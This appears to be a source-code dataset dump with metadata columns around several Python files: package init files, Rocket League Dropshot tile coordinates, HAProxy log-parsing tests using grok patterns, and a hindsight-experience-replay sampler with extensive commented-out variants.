| 0
| 0
| 0
| 0
| 0
| 0.354167
| 1
| 0.020833
| false
| 0
| 0.0625
| 0
| 0.104167
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
56829a15f0900b813742072c0108f7ebc58a24bc
| 88
|
py
|
Python
|
onmt/multiprocessing/__init__.py
|
esalesky/NMTGMinor
|
b6eafff21f5aabb874720e6df30cd6b91c339a7c
|
[
"MIT"
] | 5
|
2020-05-25T01:11:51.000Z
|
2021-02-18T08:55:43.000Z
|
onmt/multiprocessing/__init__.py
|
esalesky/NMTGMinor
|
b6eafff21f5aabb874720e6df30cd6b91c339a7c
|
[
"MIT"
] | 2
|
2021-09-14T03:18:12.000Z
|
2022-01-25T16:19:51.000Z
|
onmt/multiprocessing/__init__.py
|
esalesky/NMTGMinor
|
b6eafff21f5aabb874720e6df30cd6b91c339a7c
|
[
"MIT"
] | 1
|
2019-09-15T17:22:58.000Z
|
2019-09-15T17:22:58.000Z
|
import onmt.multiprocessing.nccl
import onmt.multiprocessing.multiprocessing_event_loop
| 29.333333
| 54
| 0.909091
| 10
| 88
| 7.8
| 0.6
| 0.25641
| 0.641026
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 88
| 2
| 55
| 44
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8e61ca46fc6535192aee57d6709ffc9e282026bb
| 66
|
py
|
Python
|
fpgrowth_py/__init__.py
|
ablarry/fpgrowth_py
|
d7671ab87d885a5cbc79e6111a89620061351789
|
[
"MIT"
] | 51
|
2020-10-25T19:12:35.000Z
|
2022-02-22T01:40:25.000Z
|
fpgrowth_py/__init__.py
|
ablarry/fpgrowth_py
|
d7671ab87d885a5cbc79e6111a89620061351789
|
[
"MIT"
] | 4
|
2020-12-22T08:45:50.000Z
|
2021-09-12T08:53:27.000Z
|
fpgrowth_py/__init__.py
|
ablarry/fpgrowth_py
|
d7671ab87d885a5cbc79e6111a89620061351789
|
[
"MIT"
] | 20
|
2020-12-01T12:59:14.000Z
|
2022-03-23T13:26:55.000Z
|
from fpgrowth_py.fpgrowth import *
from fpgrowth_py.utils import *
| 33
| 34
| 0.833333
| 10
| 66
| 5.3
| 0.5
| 0.45283
| 0.528302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106061
| 66
| 2
| 35
| 33
| 0.898305
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8ed0087f59bba1708d55020e336326c897c58410
| 5,721
|
py
|
Python
|
carball/analysis/constants/dropshot.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 119
|
2018-09-14T02:14:19.000Z
|
2022-03-06T05:06:54.000Z
|
carball/analysis/constants/dropshot.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 207
|
2018-09-06T18:53:06.000Z
|
2022-02-12T22:39:36.000Z
|
carball/analysis/constants/dropshot.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 44
|
2018-09-10T16:54:13.000Z
|
2022-02-19T03:07:50.000Z
|
from typing import Optional, Tuple, List
# taken from https://github.com/RLBot/RLBot/wiki/Dropshot
TILE_DIAMETER = 886.82
CORE_707_TILES_POSITIONS = (
# BLUE
(2304.0, -4117.4287109375, 2.5),
(1536.0, -4117.4287109375, 2.5),
(768.0, -4117.4287109375, 2.5),
(-0.0, -4117.4287109375, 2.5),
(-768.0, -4117.4287109375, 2.5),
(-1536.0, -4117.4287109375, 2.5),
(-2304.0, -4117.4287109375, 2.5),
(2688.0, -3452.322021484375, 2.5),
(1920.0, -3452.322021484375, 2.5),
(1152.0, -3452.322021484375, 2.5),
(384.0, -3452.322021484375, 2.5),
(-384.0, -3452.322021484375, 2.5),
(-1152.0, -3452.322021484375, 2.5),
(-1920.0, -3452.322021484375, 2.5),
(-2688.0, -3452.322021484375, 2.5),
(3072.0, -2788.428955078125, 2.5),
(2304.0, -2788.428955078125, 2.5),
(1536.0, -2788.428955078125, 2.5),
(768.0, -2788.428955078125, 2.5),
(-0.0, -2788.428955078125, 2.5),
(-768.0, -2788.428955078125, 2.5),
(-1536.0, -2788.428955078125, 2.5),
(-2304.0, -2788.428955078125, 2.5),
(-3072.0, -2788.428955078125, 2.5),
(3456.0, -2123.322021484375, 2.5),
(2688.0, -2123.322021484375, 2.5),
(1920.0, -2123.322021484375, 2.5),
(1152.0, -2123.322021484375, 2.5),
(384.0, -2123.322021484375, 2.5),
(-384.0, -2123.322021484375, 2.5),
(-1152.0, -2123.322021484375, 2.5),
(-1920.0, -2123.322021484375, 2.5),
(-2688.0, -2123.322021484375, 2.5),
(-3456.0, -2123.322021484375, 2.5),
(3840.0, -1458.21484375, 2.5),
(3072.0, -1458.21484375, 2.5),
(2304.0, -1458.21484375, 2.5),
(1536.0, -1458.21484375, 2.5),
(768.0, -1458.21484375, 2.5),
(-0.0, -1458.21484375, 2.5),
(-768.0, -1458.21484375, 2.5),
(-1536.0, -1458.21484375, 2.5),
(-2304.0, -1458.21484375, 2.5),
(-3072.0, -1458.21484375, 2.5),
(-3840.0, -1458.21484375, 2.5),
(4224.0, -793.1079711914062, 2.5),
(3456.0, -793.1079711914062, 2.5),
(2688.0, -793.1079711914062, 2.5),
(1920.0, -793.1079711914062, 2.5),
(1152.0, -793.1079711914062, 2.5),
(384.0, -793.1079711914062, 2.5),
(-384.0, -793.1079711914062, 2.5),
(-1152.0, -793.1079711914062, 2.5),
(-1920.0, -793.1079711914062, 2.5),
(-2688.0, -793.1079711914062, 2.5),
(-3456.0, -793.1079711914062, 2.5),
(-4224.0, -793.1079711914062, 2.5),
(4608.0, -127.99998474121094, 2.5),
(3840.0, -127.99998474121094, 2.5),
(3072.0, -127.99998474121094, 2.5),
(2304.0, -127.99998474121094, 2.5),
(1536.0, -127.99998474121094, 2.5),
(768.0, -127.99998474121094, 2.5),
(-0.0, -127.99998474121094, 2.5),
(-768.0, -127.99998474121094, 2.5),
(-1536.0, -127.99998474121094, 2.5),
(-2304.0, -128.0, 2.5),
(-3072.0, -127.99998474121094, 2.5),
(-3840.0, -127.99998474121094, 2.5),
(-4608.0, -127.99998474121094, 2.5),
# ORANGE
(4608.0, 128.0, 2.5),
(3840.0, 128.0, 2.5),
(3072.0, 128.0, 2.5),
(2304.0, 128.0, 2.5),
(1536.0, 128.0, 2.5),
(768.0, 128.0, 2.5),
(-0.0, 128.0, 2.5),
(-768.0, 128.0, 2.5),
(-1536.0, 128.0, 2.5),
(-2304.0, 128.0, 2.5),
(-3072.0, 128.0, 2.5),
(-3840.0, 128.0, 2.5),
(-4608.0, 128.0, 2.5),
(4224.0, 793.1079711914062, 2.5),
(3456.0, 793.1079711914062, 2.5),
(2688.0, 793.1079711914062, 2.5),
(1920.0, 793.1079711914062, 2.5),
(1152.0, 793.1079711914062, 2.5),
(384.0, 793.1079711914062, 2.5),
(-384.0, 793.1079711914062, 2.5),
(-1152.0, 793.1079711914062, 2.5),
(-1920.0, 793.1079711914062, 2.5),
(-2688.0, 793.1079711914062, 2.5),
(-3456.0, 793.1079711914062, 2.5),
(-4224.0, 793.1079711914062, 2.5),
(3840.0, 1458.21484375, 2.5),
(3072.0, 1458.21484375, 2.5),
(2304.0, 1458.21484375, 2.5),
(1536.0, 1458.21484375, 2.5),
(768.0, 1458.21484375, 2.5),
(-0.0, 1458.21484375, 2.5),
(-768.0, 1458.21484375, 2.5),
(-1536.0, 1458.21484375, 2.5),
(-2304.0, 1458.21484375, 2.5),
(-3072.0, 1458.21484375, 2.5),
(-3840.0, 1458.21484375, 2.5),
(3456.0, 2123.322021484375, 2.5),
(2688.0, 2123.322021484375, 2.5),
(1920.0, 2123.322021484375, 2.5),
(1152.0, 2123.322021484375, 2.5),
(384.0, 2123.322021484375, 2.5),
(-384.0, 2123.322021484375, 2.5),
(-1152.0, 2123.322021484375, 2.5),
(-1920.0, 2123.322021484375, 2.5),
(-2688.0, 2123.322021484375, 2.5),
(-3456.0, 2123.322021484375, 2.5),
(3072.0, 2788.428955078125, 2.5),
(2304.0, 2788.428955078125, 2.5),
(1536.0, 2788.428955078125, 2.5),
(768.0, 2788.428955078125, 2.5),
(-0.0, 2788.428955078125, 2.5),
(-768.0, 2788.428955078125, 2.5),
(-1536.0, 2788.428955078125, 2.5),
(-2304.0, 2788.428955078125, 2.5),
(-3072.0, 2788.428955078125, 2.5),
(2688.0, 3452.322021484375, 2.5),
(1920.0, 3452.322021484375, 2.5),
(1152.0, 3452.322021484375, 2.5),
(384.0, 3452.322021484375, 2.5),
(-384.0, 3452.322021484375, 2.5),
(-1152.0, 3452.322021484375, 2.5),
(-1920.0, 3452.322021484375, 2.5),
(-2688.0, 3452.322021484375, 2.5),
(2304.0, 4117.4287109375, 2.5),
(1536.0, 4117.4287109375, 2.5),
(768.0, 4117.4287109375, 2.5),
(-0.0, 4117.4287109375, 2.5),
(-768.0, 4117.4287109375, 2.5),
(-1536.0, 4117.4287109375, 2.5),
(-2304.0, 4117.4287109375, 2.5)
)
_MAPPING = {
'ShatterShot_P': CORE_707_TILES_POSITIONS
}
def get_tile_positions(map_name: str) -> Optional[Tuple[Tuple]]:
return _MAPPING.get(map_name, None)
def get_team_tiles(map_name: str, team: int) -> List[int] or None:
if map_name == 'ShatterShot_P':
if team == 0:
return list(range(70))
else:
return list(range(70, 140))
return None
| 33.852071
| 66
| 0.573152
| 921
| 5,721
| 3.539631
| 0.076004
| 0.08589
| 0.154601
| 0.132515
| 0.88773
| 0.88773
| 0.883742
| 0.882515
| 0.866564
| 0.866564
| 0
| 0.632595
| 0.194546
| 5,721
| 168
| 67
| 34.053571
| 0.07487
| 0.011711
| 0
| 0
| 0
| 0
| 0.004602
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012821
| false
| 0
| 0.00641
| 0.00641
| 0.044872
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d96489b668cc30ed0c4974324fed7778390273e5
| 1,553
|
py
|
Python
|
tests/test_haproxy.py
|
markfink/korg
|
6a123031b69896f61fe0007f4a1d5f6f064b6ad9
|
[
"MIT"
] | null | null | null |
tests/test_haproxy.py
|
markfink/korg
|
6a123031b69896f61fe0007f4a1d5f6f064b6ad9
|
[
"MIT"
] | 2
|
2020-01-18T10:32:13.000Z
|
2020-01-18T10:34:17.000Z
|
tests/test_haproxy.py
|
markfink/korg
|
6a123031b69896f61fe0007f4a1d5f6f064b6ad9
|
[
"MIT"
] | null | null | null |
from korg import LineGrokker, PatternRepo
pr = PatternRepo()
def test_haproxy():
lg = LineGrokker('%{HAPROXYHTTP}', pr)
match = lg.grok('Dec 9 13:01:26 localhost haproxy[28029]: 127.0.0.1:39759 [09/Dec/2013:12:59:46.633] loadbalancer default/instance8 0/51536/1/48082/99627 200 83285 - - ---- 87/87/87/1/0 0/67 {77.24.148.74} "GET /path/to/image HTTP/1.1"')
assert match is not None
assert match["program"] == "haproxy"
assert match["client_ip"] == "127.0.0.1"
assert match["http_verb"] == "GET"
assert match["server_name"] == "instance8"
def test_haproxy_iso8601_timestamp():
lg = LineGrokker('%{HAPROXYHTTP}', pr)
match = lg.grok('2015-08-26T02:09:48+02:00 localhost haproxy[28029]: 127.0.0.1:39759 [09/Dec/2013:12:59:46.633] loadbalancer default/instance8 0/51536/1/48082/99627 200 83285 - - ---- 87/87/87/1/0 0/67 {77.24.148.74} "GET /path/to/image HTTP/1.1"')
assert match is not None
assert match["program"] == "haproxy"
assert match["client_ip"] == "127.0.0.1"
assert match["http_verb"] == "GET"
assert match["server_name"] == "instance8"
def test_haproxyhttpbase():
lg = LineGrokker('%{HAPROXYHTTPBASE}', pr)
match = lg.grok('127.0.0.1:39759 [09/Dec/2013:12:59:46.633] loadbalancer default/instance8 0/51536/1/48082/99627 200 83285 - - ---- 87/87/87/1/0 0/67 {77.24.148.74} "GET /path/to/image HTTP/1.1"')
assert match is not None
assert match["client_ip"] == "127.0.0.1"
assert match["http_verb"] == "GET"
assert match["server_name"] == "instance8"
| 41.972973
| 252
| 0.658081
| 254
| 1,553
| 3.968504
| 0.267717
| 0.152778
| 0.029762
| 0.035714
| 0.830357
| 0.830357
| 0.830357
| 0.756944
| 0.756944
| 0.756944
| 0
| 0.215103
| 0.155827
| 1,553
| 36
| 253
| 43.138889
| 0.553776
| 0
| 0
| 0.64
| 0
| 0.12
| 0.546684
| 0.10689
| 0
| 0
| 0
| 0
| 0.56
| 1
| 0.12
| false
| 0
| 0.04
| 0
| 0.16
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
79a7db380cd793d775d8ec80c037549586a0af24
| 25,046
|
py
|
Python
|
baselines/her/her_sampler.py
|
ekwyss/baselines
|
3ee276fd3be5d330aaacaa3d478929ead4cb1d34
|
[
"MIT"
] | null | null | null |
baselines/her/her_sampler.py
|
ekwyss/baselines
|
3ee276fd3be5d330aaacaa3d478929ead4cb1d34
|
[
"MIT"
] | null | null | null |
baselines/her/her_sampler.py
|
ekwyss/baselines
|
3ee276fd3be5d330aaacaa3d478929ead4cb1d34
|
[
"MIT"
] | null | null | null |
import numpy as np
import pickle
# TODO: have both sampler run on every episode and compare
# also check place where it decides whether to update or not
def make_sample_her_transitions(replay_strategy, replay_k, reward_fun, policy_index):
"""Creates a sample function that can be used for HER experience replay.
Args:
replay_strategy (in ['future', 'none']): the HER replay strategy; if set to 'none',
regular DDPG experience replay is used
replay_k (int): the ratio between HER replays and regular replays (e.g. k = 4 -> 4 times
as many HER replays as regular replays are used)
reward_fun (function): function to re-compute the reward with substituted goals
"""
if replay_strategy == 'future':
future_p = 1 - (1. / (1 + replay_k))
else: # 'replay_strategy' == 'none'
future_p = 0
def _sample_her_transitions(episode_batch, batch_size_in_transitions, ep_Ts):
# if batch_size_in_transitions != 49:
# pickle.dump(episode_batch, open("example_episode_3.pkl", "wb"))
# 10/0
# print(replay_k)
# print(batch_size_in_transitions)
"""episode_batch is {key: array(buffer_size x T x dim_key)}
"""
T = episode_batch['u'].shape[1]
rollout_batch_size = episode_batch['u'].shape[0]
batch_size = batch_size_in_transitions
# #limit on transition number we can sample from (has to correspond to relevant subgoal)
# ep_Ts = []
# ##Attempt for subgoal based sampling, not using for now
# # for i in range(rollout_batch_size):
# # goal_indices = np.where(episode_batch['info_is_success'][i] == 1)[0]
# # cand_indices = [policy_index for policy_index in policy_indexes if policy_index <= len(goal_indices)]
# # if len(cand_indices) == 0:
# # ep_Ts.append(0)
# # continue
# # #specific to this bc only 3 subgoals total
# # if len(goal_indices) > 2:
# # goal_indices = np.concatenate((goal_indices[:2],goal_indices[-1:]))
# # else:
# # goal_indices = np.concatenate((goal_indices,[T]))
# # ep_Ts.append(goal_indices[cand_indices[-1]])
# # 3 policy
# for i in range(rollout_batch_size):
# goal_indices = np.where(episode_batch['info_is_success'][i] == 1)[0]
# #if don't reach relevant subgoal, don't sample
# if policy_index > len(goal_indices):
# ep_Ts.append(0)
# continue
# #specific to this bc only 3 subgoals total, see if can get subgoal amount from anywhere
# if len(goal_indices) > 2:
# #subgoal indices coincide to first two subgoals reached + last timestep we are still in last subgoal
# #*but what if we reach last goal, stray out of zone, then return?
# goal_indices = np.concatenate((goal_indices[:2],goal_indices[-1:]))
# else:
# #otherwise we didn't reach the final goal, add goal_indices and total num of timesteps
# goal_indices = np.concatenate((goal_indices,[T]))
# #Cap transition number we can sample from for use with relevant subgoal policy
# ep_Ts.append(goal_indices[policy_index])
#1 policy
# for i in range(rollout_batch_size):
# ep_Ts.append(T)
num_candidate_transitions = sum(ep_Ts)
##PUT THIS IN POLICIES.PY TO SEE IF SHOULD TRAIN POLICY OR NOT, COMPUTATIONALLY REALLY INEFFICIENT, FIX
##done, but need to find more efficient way
# if num_candidate_transitions == 0:
# transitions = {key : np.array([]) for key in episode_batch.keys()}
# transitions['r'] = np.array([])
# transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# for k in transitions.keys()}
# return transitions
# else:
#proba of picking transition from each episode for sampling, based on ratio of candidate transitions within episode to total num of candidate transitions
probas = [ep_T / num_candidate_transitions for ep_T in ep_Ts]
#episode of each sampled transition
episode_idxs = np.sort(np.random.choice(rollout_batch_size,batch_size,p=probas))
#List denoting how many transitions will be sampled from each corresponding episode according to index
t_per_ep = [np.sum(episode_idxs == i) for i in range(rollout_batch_size)]
# print("policy_index", policy_index)
# print("ep_Ts:", ep_Ts)
# print("num_cand_trans:", num_candidate_transitions)
# print(rollout_batch_size)
# print(batch_size)
# print("probas:", probas)
# print("ep_idxs:", episode_idxs)
# print("t_per_ep:", t_per_ep)
# TAKE t_per_ep SAMPLE FROM EVERY EP AND LINE UP WITH episode_idxs THEN SHUFFLE TOGETHER FOR USE IN CREATING TRANSITIONS
t_samples = []
future_offsets = []
# her_indexes = []
# future_t = []
# future_ag = []
#TODO: currently using "future" strategy, test against subgoal-based. Also see if explicitly enforcing "final" changes much
for i in range(rollout_batch_size):
#calculate relevant info for corresponding episode
t_samps = np.random.randint(ep_Ts[i],size=t_per_ep[i])
# her_inds = np.where(np.random.uniform(size=t_per_ep[i]) < future_p)[0]
future_offset = np.random.uniform(size=t_per_ep[i]) * (ep_Ts[i] - t_samps)
future_offset = future_offset.astype(int)
# her_ind = her_inds.astype(int)
# fut_t = (t_samps + 1 + future_offset)[her_inds]
# fut_ag = episode_batch['ag'][episode_idxs[her_inds], fut_t]
#TODO: does it matter if this is shuffled or not?
#shuffle all info together
# inds = np.arange(t_per_ep[i])
# np.random.shuffle(inds)
# t_samps = t_samps[inds]
# # her_inds = her_inds[inds[her_inds]]
# fut_t = fut_t[inds[her_inds]]
# fut_ag = fut_ag[inds[her_inds]]
#concat to output
if i == 0:
t_samples = t_samps.copy()
future_offsets = future_offset.copy()
# her_indexes = her_inds.copy()
# future_t = fut_t.copy()
# future_ag = fut_ag.copy()
else:
t_samples = np.concatenate((t_samples,t_samps))
future_offsets = np.concatenate((future_offsets,future_offset))
# her_indexes = np.concatenate((her_indexes, her_inds))
# future_t = np.concatenate((future_t, fut_t))
# future_ag = np.concatenate((future_ag,fut_ag))
her_indexes = np.where(np.random.uniform(size=batch_size) < future_p)
future_t = (t_samples + 1 + future_offsets)[her_indexes]
future_ag = episode_batch['ag'][episode_idxs[her_indexes], future_t]
transitions = {key: episode_batch[key][episode_idxs, t_samples].copy()
for key in episode_batch.keys()}
transitions['g'][her_indexes] = future_ag
# Reconstruct info dictionary for reward computation.
info = {}
for key, value in transitions.items():
if key.startswith('info_'):
info[key.replace('info_', '')] = value
# Re-compute reward since we may have substituted the goal.
reward_params = {k: transitions[k] for k in ['ag_2', 'g']}
reward_params['info'] = info
transitions['r'] = reward_fun(**reward_params)
transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
for k in transitions.keys()}
assert(transitions['u'].shape[0] == batch_size_in_transitions)
return transitions
return _sample_her_transitions
############# 2/27 w/o comments #################
# import numpy as np
# import pickle
# def make_sample_her_transitions(replay_strategy, replay_k, reward_fun, policy_index):
# """Creates a sample function that can be used for HER experience replay.
# Args:
# replay_strategy (in ['future', 'none']): the HER replay strategy; if set to 'none',
# regular DDPG experience replay is used
# replay_k (int): the ratio between HER replays and regular replays (e.g. k = 4 -> 4 times
# as many HER replays as regular replays are used)
# reward_fun (function): function to re-compute the reward with substituted goals
# """
# if replay_strategy == 'future':
# future_p = 1 - (1. / (1 + replay_k))
# else: # 'replay_strategy' == 'none'
# future_p = 0
# def _sample_her_transitions(episode_batch, batch_size_in_transitions, ep_Ts):
# T = episode_batch['u'].shape[1]
# rollout_batch_size = episode_batch['u'].shape[0]
# batch_size = batch_size_in_transitions
# num_candidate_transitions = sum(ep_Ts)
# probas = [ep_T / num_candidate_transitions for ep_T in ep_Ts]
# episode_idxs = np.sort(np.random.choice(rollout_batch_size,batch_size,p=probas))
# t_per_ep = [np.sum(episode_idxs == i) for i in range(rollout_batch_size)]
# # TAKE t_per_ep SAMPLE FROM EVERY EP AND LINE UP WITH episode_idxs THEN SHUFFLE TOGETHER FOR USE IN CREATING TRANSITIONS
# t_samples = []
# future_offsets = []
# for i in range(rollout_batch_size):
# #calculate relevant info for corresponding episode
# t_samps = np.random.randint(ep_Ts[i],size=t_per_ep[i])
# future_offset = np.random.uniform(size=t_per_ep[i]) * (ep_Ts[i] - t_samps)
# future_offset = future_offset.astype(int)
# #concat to output
# if i == 0:
# t_samples = t_samps.copy()
# future_offsets = future_offset.copy()
# else:
# t_samples = np.concatenate((t_samples,t_samps))
# future_offsets = np.concatenate((future_offsets,future_offset))
# her_indexes = np.where(np.random.uniform(size=batch_size) < future_p)
# future_t = (t_samples + 1 + future_offsets)[her_indexes]
# future_ag = episode_batch['ag'][episode_idxs[her_indexes], future_t]
# transitions = {key: episode_batch[key][episode_idxs, t_samples].copy()
# for key in episode_batch.keys()}
# transitions['g'][her_indexes] = future_ag
# # Reconstruct info dictionary for reward computation.
# info = {}
# for key, value in transitions.items():
# if key.startswith('info_'):
# info[key.replace('info_', '')] = value
# # Re-compute reward since we may have substituted the goal.
# reward_params = {k: transitions[k] for k in ['ag_2', 'g']}
# reward_params['info'] = info
# transitions['r'] = reward_fun(**reward_params)
# transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# for k in transitions.keys()}
# assert(transitions['u'].shape[0] == batch_size_in_transitions)
# return transitions
# return _sample_her_transitions
# ############### ORIGINAL #####################
# import numpy as np
# def make_sample_her_transitions(replay_strategy, replay_k, reward_fun, policy_index):
# """Creates a sample function that can be used for HER experience replay.
# Args:
# replay_strategy (in ['future', 'none']): the HER replay strategy; if set to 'none',
# regular DDPG experience replay is used
# replay_k (int): the ratio between HER replays and regular replays (e.g. k = 4 -> 4 times
# as many HER replays as regular replays are used)
# reward_fun (function): function to re-compute the reward with substituted goals
# """
# if replay_strategy == 'future':
# future_p = 1 - (1. / (1 + replay_k))
# else: # 'replay_strategy' == 'none'
# future_p = 0
# def _sample_her_transitions(episode_batch, batch_size_in_transitions):
# """episode_batch is {key: array(buffer_size x T x dim_key)}
# """
# print(batch_size_in_transitions)
# T = episode_batch['u'].shape[1]
# rollout_batch_size = episode_batch['u'].shape[0]
# batch_size = batch_size_in_transitions
# # Select which episodes and time steps to use.
# episode_idxs = np.random.randint(0, rollout_batch_size, batch_size)
# t_samples = np.random.randint(T, size=batch_size)
# transitions = {key: episode_batch[key][episode_idxs, t_samples].copy()
# for key in episode_batch.keys()}
# # Select future time indexes proportional with probability future_p. These
# # will be used for HER replay by substituting in future goals.
# her_indexes = np.where(np.random.uniform(size=batch_size) < future_p)
# future_offset = np.random.uniform(size=batch_size) * (T - t_samples)
# future_offset = future_offset.astype(int)
# future_t = (t_samples + 1 + future_offset)[her_indexes]
# # Replace goal with achieved goal but only for the previously-selected
# # HER transitions (as defined by her_indexes). For the other transitions,
# # keep the original goal.
# future_ag = episode_batch['ag'][episode_idxs[her_indexes], future_t]
# transitions['g'][her_indexes] = future_ag
# # Reconstruct info dictionary for reward computation.
# info = {}
# for key, value in transitions.items():
# if key.startswith('info_'):
# info[key.replace('info_', '')] = value
# # Re-compute reward since we may have substituted the goal.
# reward_params = {k: transitions[k] for k in ['ag_2', 'g']}
# reward_params['info'] = info
# transitions['r'] = reward_fun(**reward_params)
# transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# for k in transitions.keys()}
# assert(transitions['u'].shape[0] == batch_size_in_transitions)
# return transitions
# return _sample_her_transitions
######################Testing###########################
# import numpy as np
# def _sample_her_transitions_orig(episode_batch, batch_size_in_transitions, future_p, replay_k, reward_fun, policy_index):
# """episode_batch is {key: array(buffer_size x T x dim_key)}
# """
# T = episode_batch['u'].shape[1]
# rollout_batch_size = episode_batch['u'].shape[0]
# batch_size = batch_size_in_transitions
# np.random.seed(0)
# # Select which episodes and time steps to use.
# episode_idxs = np.random.randint(0, rollout_batch_size, batch_size)
# np.random.seed(0)
# np.random.seed(0)
# t_samples = np.random.randint(T, size=batch_size)
# transitions = {key: episode_batch[key][episode_idxs, t_samples].copy()
# for key in episode_batch.keys()}
# # Select future time indexes proportional with probability future_p. These
# # will be used for HER replay by substituting in future goals.
# np.random.seed(0)
# her_indexes = np.where(np.random.uniform(size=batch_size) < future_p)
# np.random.seed(0)
# future_offset = np.random.uniform(size=batch_size) * (T - t_samples)
# future_offset = future_offset.astype(int)
# future_t = (t_samples + 1 + future_offset)[her_indexes]
# # Replace goal with achieved goal but only for the previously-selected
# # HER transitions (as defined by her_indexes). For the other transitions,
# # keep the original goal.
# future_ag = episode_batch['ag'][episode_idxs[her_indexes], future_t]
# transitions['g'][her_indexes] = future_ag
# # Reconstruct info dictionary for reward computation.
# info = {}
# for key, value in transitions.items():
# if key.startswith('info_'):
# info[key.replace('info_', '')] = value
# # Re-compute reward since we may have substituted the goal.
# reward_params = {k: transitions[k] for k in ['ag_2', 'g']}
# reward_params['info'] = info
# transitions['r'] = reward_fun(**reward_params)
# transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# for k in transitions.keys()}
# assert(transitions['u'].shape[0] == batch_size_in_transitions)
# return transitions
# def _sample_her_transitions_subgoal(episode_batch, batch_size_in_transitions, future_p, replay_k, reward_fun, policy_index):
# # if batch_size_in_transitions != 49:
# # pickle.dump(episode_batch, open("example_episode_3.pkl", "wb"))
# # 10/0
# # print(replay_k)
# # print(batch_size_in_transitions)
# """episode_batch is {key: array(buffer_size x T x dim_key)}
# """
# T = episode_batch['u'].shape[1]
# rollout_batch_size = episode_batch['u'].shape[0]
# batch_size = batch_size_in_transitions
# #limit on transition number we can sample from (has to correspond to relevant subgoal)
# ep_Ts = []
# ##Attempt for subgoal based sampling, not using for now
# # for i in range(rollout_batch_size):
# # goal_indices = np.where(episode_batch['info_is_success'][i] == 1)[0]
# # cand_indices = [policy_index for policy_index in policy_indexes if policy_index <= len(goal_indices)]
# # if len(cand_indices) == 0:
# # ep_Ts.append(0)
# # continue
# # #specific to this bc only 3 subgoals total
# # if len(goal_indices) > 2:
# # goal_indices = np.concatenate((goal_indices[:2],goal_indices[-1:]))
# # else:
# # goal_indices = np.concatenate((goal_indices,[T]))
# # ep_Ts.append(goal_indices[cand_indices[-1]])
# #3 policy
# # for i in range(rollout_batch_size):
# # goal_indices = np.where(episode_batch['info_is_success'][i] == 1)[0]
# # #if don't reach relevant subgoal, don't sample
# # if policy_index > len(goal_indices):
# # ep_Ts.append(0)
# # continue
# # #specific to this bc only 3 subgoals total, see if can get subgoal amount from anywhere
# # if len(goal_indices) > 2:
# # #subgoal indices coincide to first two subgoals reached + last timestep we are still in last subgoal
# # #*but what if we reach last goal, stray out of zone, then return?
# # goal_indices = np.concatenate((goal_indices[:2],goal_indices[-1:]))
# # else:
# # #otherwise we didn't reach the final goal, add goal_indices and total num of timesteps
# # goal_indices = np.concatenate((goal_indices,[T]))
# # #Cap transition number we can sample from for use with relevant subgoal policy
# # ep_Ts.append(goal_indices[policy_index])
# #1 policy
# for i in range(rollout_batch_size):
# ep_Ts.append(49)
# num_candidate_transitions = sum(ep_Ts)
# ##PUT THIS IN POLICIES.PY TO SEE IF SHOULD TRAIN POLICY OR NOT, COMPUTATIONALLY REALLY INEFFICIENT, FIX
# ##done, but need to find more efficient way
# # if num_candidate_transitions == 0:
# # transitions = {key : np.array([]) for key in episode_batch.keys()}
# # transitions['r'] = np.array([])
# # transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# # for k in transitions.keys()}
# # return transitions
# # else:
# #proba of picking transition from each episode for sampling, based on ratio of candidate transitions within episode to total num of candidate transitions
# probas = [ep_T / num_candidate_transitions for ep_T in ep_Ts]
# np.random.seed(0)
# #episode of each sampled transition
# episode_idxs = np.sort(np.random.choice(rollout_batch_size,batch_size,p=probas))
# #List denoting how many transitions will be sampled from each corresponding episode according to index
# t_per_ep = [np.sum(episode_idxs == i) for i in range(rollout_batch_size)]
